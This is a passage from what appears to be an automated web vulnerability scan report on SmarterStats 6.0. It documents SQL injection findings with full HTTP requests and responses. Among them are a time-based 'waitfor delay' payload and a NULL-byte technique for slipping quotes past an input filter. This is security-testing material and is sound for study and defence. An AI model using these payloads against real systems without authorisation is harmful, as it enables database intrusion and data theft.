theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>

<script language="javascript">window.onload = function() { if (document.getElementById('ctl00$MPH$txtSiteId') != null) document.getElementById('ctl00$MPH$txtSiteId').focus(); } </script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <div id="ctl00_UpdatePanel1">
   
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
       <option selected="selected" value="">Use Browser Language</option>
       <option value="en">English</option>

   </select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;DA&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dDA\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               

                   <script type="text/javascript">
                       $(document).ready(function() {
                           $('select').each(function() {
                               if ($(this).width() > 180) $(this).width(180);
                           });
                       }); </script>

               
           
</div>
       
   

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtSiteId');//]]>
</script>
</form>
</body>
</html>


2.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter appears to be vulnerable to SQL injection attacks. The payload )waitfor%20delay'0%3a0%3a20'-- was submitted in the ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30100

ctl00%24ScriptManager1=ctl00%24MPH%24UpdatePanel5%7Cctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTTARGET=ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTYwMDgwNjA1Nw8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWDAICD2QWAgIBDxYCHgdWaXNpYmxlaGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ8WAh8CaBYCAgEPFgIeBFRleHRlZAIID2QWAgIBD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgQPFgIfAmhkAgkPZBYEAgEPZBYCAgMPFgIfBAUHTWVzc2FnZWQCAw9kFgJmD2QWAgIHD2QWCAICD2QWBgIBD2QWDmYPZBYCAgEPZBYCAgIPDxYCHwQFCGhveXQubmV0ZGQCAg8PFgIeCl9fcmVhZE9ubHlnZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIDD2QWAgIBD2QWBGYPEGQPFgFmFgEQBQlsb2NhbGhvc3QFATFnZGQCAg8PFgIfBAUJbG9jYWxob3N0ZGQCBA9kFgICAQ9kFgJmDxBkEBUDB1N0YXJ0ZWQGUGF1c2VkCERpc2FibGVkFQMFc3RhcnQGcGF1c2VkCGRpc2FibGVkFCsDA2dnZ2RkAgUPZBYEZg8PFgYeCENzc0NsYXNzBQxJbmRlbnQgRml4ZWQfBAUPU21hcnRlckxvZyBQYXRoHgRfIVNCAgJkZAIBDw8WBB8GBQggU2V0dGluZx8HAgJkZAIGDw8WAh8FZ2QWAgIBD2QWBGYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldxsoR01ULTA2OjAwKSBDZW50cmFsIEFtZXJpY2EmKEdNVC0wNTowMCkgRWFzdGVybiBUaW1lIChVUyAmIENhbmFkYSkaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkrKEdNVC0wNTowMCkgQm9nb3RhLCBMaW1hLCBRdWl0bywgUmlvIEJyYW5jbxMoR01ULTA0OjMwKSBDYXJhY2FzEihHTVQtMDQ6MDApIE1hbmF1cyIoR01ULTA0OjAwKSBBdGxhbnRpYyBUaW1lIChDYW5hZGEpEihHTVQtMDQ6MDApIExhIFBhehQoR01ULTA0OjAwKSBTYW50
diy8rNReMpN8%3D&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-&ctl00_MPH_grdLogLocations_HiddenLSR=0&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5)waitfor%20delay'0%3a0%3a20'--&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%
24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:14:15 GMT
Content-Length: 0


2.4. http://vulnerable.smarterstats.6.0.host:9999/Default.aspx [ctl00%24PageTitle parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Default.aspx

Issue detail

The ctl00%24PageTitle parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ctl00%24PageTitle parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST /Default.aspx?section=UserDataMining HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Default.aspx?section=UserDataMining
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 1786

ctl00%24Split%24LP%24ctl01%24dtStart%24dateInput=555-555-0199@example.com&__LASTFOCUS=&ctl00%24PageTitle=%00'&ctl00%24Split%24LP%24ctl01%24dtEnd%24dateInput=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtEnd_ClientState=&ctl00%24Split%24LP%24ctl01%24ddChart=NONE&ctl00_Split_LP_ctl01_dtStart_calendar_SD=%5b%5d&ctl00%24Split%24LP%24SessionKey=275a2fda26bf41d0a434458863c81036&ctl00%24Split%24LP%24ctl01%24dtStart=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtStart_dateInput_text=555-555-0199@example.com&ctl00%24Split%24LP%24ctl01%24ddQuery=INT_DailyActivity&__EVENTTARGET=&ctl00%24PanelLoadedState=%7b%7d&__EVENTARGUMENT=&ctl00_Split_LP_ctl01_dtStart_calendar_AD=%5b%5b1800%2c1%2c1%5d%2c%5b2200%2c1%2c1%5d%2c%5b2010%2c10%2c9%5d%5d&ctl00_Split_LP_ctl01_dtEnd_calendar_SD=%5b%5d&ctl00%24Split%24LP%24ctl01%24ddRows=25&ctl00_Split_LP_ctl01_dtStart_dateInput_ClientState=&ctl00_Split_LP_ctl01_dtEnd_dateInput_text=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtEnd_calendar_AD=%5b%5b1800%2c1%2c1%5d%2c%5b2200%2c1%2c1%5d%2c%5b2010%2c10%2c9%5d%5d&ctl00_Split_LP_ctl01_dtStart_ClientState=&ctl00%24Split%24LP%24ctl01%24ddFilter=32A21FBCC3ED4d24A2E81ABB427296FC&__VIEWSTATE=%2fwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBgUcY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydAUlY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydCRjYWxlbmRhcgUlY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydCRjYWxlbmRhcgUaY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRFbmQFI2N0bDAwJFNwbGl0JExQJGN0bDAxJGR0RW5kJGNhbGVuZGFyBSNjdGwwMCRTcGxpdCRMUCRjdGwwMSRkdEVuZCRjYWxlbmRhcipOUc8WbZkeVu9zDeg3H%2bPLCcj9P%2bl2rC80zaft0u2D&ctl00_Split_LP_ctl01_dtEnd_dateInput_ClientState=&ctl00%24Split%24LP%24ctl01%24dtEnd=555-555-0199@example.com&ctl00%24Split%24LP%24ctl01%24txtFilename=Peter+Wiener

Response 1 (redirected)

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:17:26 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6130
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="Error">
<head id="ctl00_Head1"><title>
   Message - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Error/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Error" dir="ltr">
<form name="aspnetForm" method="post" action="frmError.aspx?aspxerrorpath=%2fDefault.aspx" id="aspnetForm" class="Error">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTE0MTI3MTY2DxYGHghfX19UaXRsZQUHTWVzc2FnZR4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWBAIDDw8WAh4EVGV4dAUSJiN4MkY7RGVmYXVsdC5hc3B4ZGQCBw8PFgIfAwXSATxwPlRoZSBwYWdlIG9yIHJlc291cmNlIHRoYXQgeW91IGFyZSBhY2Nlc3NpbmcgaXMgdW5hdmFpbGFibGUgb3IgYW4gZXJyb3IgaGFzIG9jY3VycmVkLjwvcD4NCg0KPHA+VGhpcyBlcnJvciBvY2N1cnJlZCBhdCAxMC8xMi8yMDEwIDEyOjE3OjI2IEFNIGFuZCBoYXMgYmVlbiBsb2dnZWQuIFBsZWFzZSBjb250YWN0IHlvdXIgc3lzdGVtIGFkbWluaXN0cmF0b3IuPC9wPmRkZLSJ/XhweHnyPIJfVjF1wqLG0+lAk7tGsQ1E3+6Hn1C+" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
</script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', [], [], [], 90, 'ctl00');
//]]>
</script>

<div class="CenteredError">
<div class="ShadowBox">
<div class="ErrorBox">
<div class="ErrorTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="ErrorTitleText">
An Error Occurred
</div>
</div>
</div>
</div>
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div class="ErrorSpacer">
</div>
<div class="ErrorContent">

<div class="ErrorSetting">
<div class="ErrorLabel">
Page:
</div>
<span id="ctl00_MPH_lblPageName">&#x2F;Default.aspx</span>
</div>
<div class="ErrorSetting">
<div class="ErrorLabel">
Message
</div>
<span id="ctl00_MPH_lblError"><p>The page or resource that you are accessing is unavailable or an error has occurred.</p>

<p>This error occurred at 10/12/2010 12:17:26 AM and has been logged. Please contact your system administrator.</p></span>
</div>

</div>
<div class="ErrorButtons">
<div class="ErrorButtonsLeft">

</div>

<div id="ctl00_BrPH_BackIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='1' onclick=" __doPostBack('ctl00$BrPH$BackIcon',''); return false;"><span class="BBInner">Back</span></a></div>

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>

</form>
</body>
</html>

Request 2

POST /Default.aspx?section=UserDataMining HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Default.aspx?section=UserDataMining
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 1786

ctl00%24Split%24LP%24ctl01%24dtStart%24dateInput=555-555-0199@example.com&__LASTFOCUS=&ctl00%24PageTitle=%00''&ctl00%24Split%24LP%24ctl01%24dtEnd%24dateInput=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtEnd_ClientState=&ctl00%24Split%24LP%24ctl01%24ddChart=NONE&ctl00_Split_LP_ctl01_dtStart_calendar_SD=%5b%5d&ctl00%24Split%24LP%24SessionKey=275a2fda26bf41d0a434458863c81036&ctl00%24Split%24LP%24ctl01%24dtStart=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtStart_dateInput_text=555-555-0199@example.com&ctl00%24Split%24LP%24ctl01%24ddQuery=INT_DailyActivity&__EVENTTARGET=&ctl00%24PanelLoadedState=%7b%7d&__EVENTARGUMENT=&ctl00_Split_LP_ctl01_dtStart_calendar_AD=%5b%5b1800%2c1%2c1%5d%2c%5b2200%2c1%2c1%5d%2c%5b2010%2c10%2c9%5d%5d&ctl00_Split_LP_ctl01_dtEnd_calendar_SD=%5b%5d&ctl00%24Split%24LP%24ctl01%24ddRows=25&ctl00_Split_LP_ctl01_dtStart_dateInput_ClientState=&ctl00_Split_LP_ctl01_dtEnd_dateInput_text=555-555-0199@example.com&ctl00_Split_LP_ctl01_dtEnd_calendar_AD=%5b%5b1800%2c1%2c1%5d%2c%5b2200%2c1%2c1%5d%2c%5b2010%2c10%2c9%5d%5d&ctl00_Split_LP_ctl01_dtStart_ClientState=&ctl00%24Split%24LP%24ctl01%24ddFilter=32A21FBCC3ED4d24A2E81ABB427296FC&__VIEWSTATE=%2fwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBgUcY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydAUlY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydCRjYWxlbmRhcgUlY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRTdGFydCRjYWxlbmRhcgUaY3RsMDAkU3BsaXQkTFAkY3RsMDEkZHRFbmQFI2N0bDAwJFNwbGl0JExQJGN0bDAxJGR0RW5kJGNhbGVuZGFyBSNjdGwwMCRTcGxpdCRMUCRjdGwwMSRkdEVuZCRjYWxlbmRhcipOUc8WbZkeVu9zDeg3H%2bPLCcj9P%2bl2rC80zaft0u2D&ctl00_Split_LP_ctl01_dtEnd_dateInput_ClientState=&ctl00%24Split%24LP%24ctl01%24dtEnd=555-555-0199@example.com&ctl00%24Split%24LP%24ctl01%24txtFilename=Peter+Wiener

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:17:26 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24491
Connection: Close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   .&#x27;&#x27;
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type='text/javascript'>
       if (parent.UpdateSection != null)
           parent.location.href = location.href;
   </script>

